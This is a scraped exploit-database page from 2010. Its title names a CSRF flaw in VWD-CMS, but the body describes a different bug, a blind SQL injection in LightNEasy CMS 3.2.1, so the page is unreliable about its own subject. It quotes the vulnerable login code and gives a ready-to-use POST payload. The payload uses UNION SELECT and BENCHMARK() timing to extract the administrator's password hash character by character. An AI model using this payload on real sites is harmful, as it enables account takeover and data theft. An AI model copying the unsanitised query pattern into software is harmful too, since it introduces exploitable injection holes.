[webapps / 0day] - VWD-CMS CSRF Vulnerability
Posted on 20 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>VWD-CMS CSRF Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: Solidmedia' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>========================== VWD-CMS CSRF Vulnerability ========================== # Exploit Title: LightNEasy Cms 3.2.1 Blind SQL Injection Vulnerability # Date: 20.09.2010 # Author: Stephan Sattler // Solidmedia.de # Software Website: http://www.lightneasy.org/ # Software Link: http://www.lightneasy.org/addons/downloads/send.php?dlid=127 # Version: 3.2.1 # Special Thanks to: Dominik Landtwing [ Vulnerability] # Vulnerable Code: common.php line 112-148 function login() { global $message, $set, $langmessage, $prefix; if($_SESSION[$set['password']]!="1") { if($_GET['do']=="login" && $_POST['handle']!="") { $result=dbquery('SELECT * FROM '.$prefix.'users WHERE handle="'.$_POST['handle'].'"'); if($row = fetch_array($result)) { if($row['password'] == sha1($_POST['password'])) { ... }}}}} # Explanation: $_POST['handle'] isn't sanitized before executing the database query. Since the only user after a fresh install is the admin-user with id 1 and a normal visitor can't register we have to retrieve the admin hash by using benchmark(). # Exploiting the Vulnerability // PoC: URL: http://localhost/LNE/LightNEasy.php?do=login Postdata: handle=" UNION SELECT IF(SUBSTRING(password,1 ,1) = CHAR(98), BENCHMARK(1000000, ENCODE('Slow','Down')), null),2,3,4,5,6,7,8,9,10,11 FROM lne_users WHERE id="1&password=&do=login&=Login This will trigger benchmark() if the first character of the admin hash is b. # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-20]</pre></body></html>
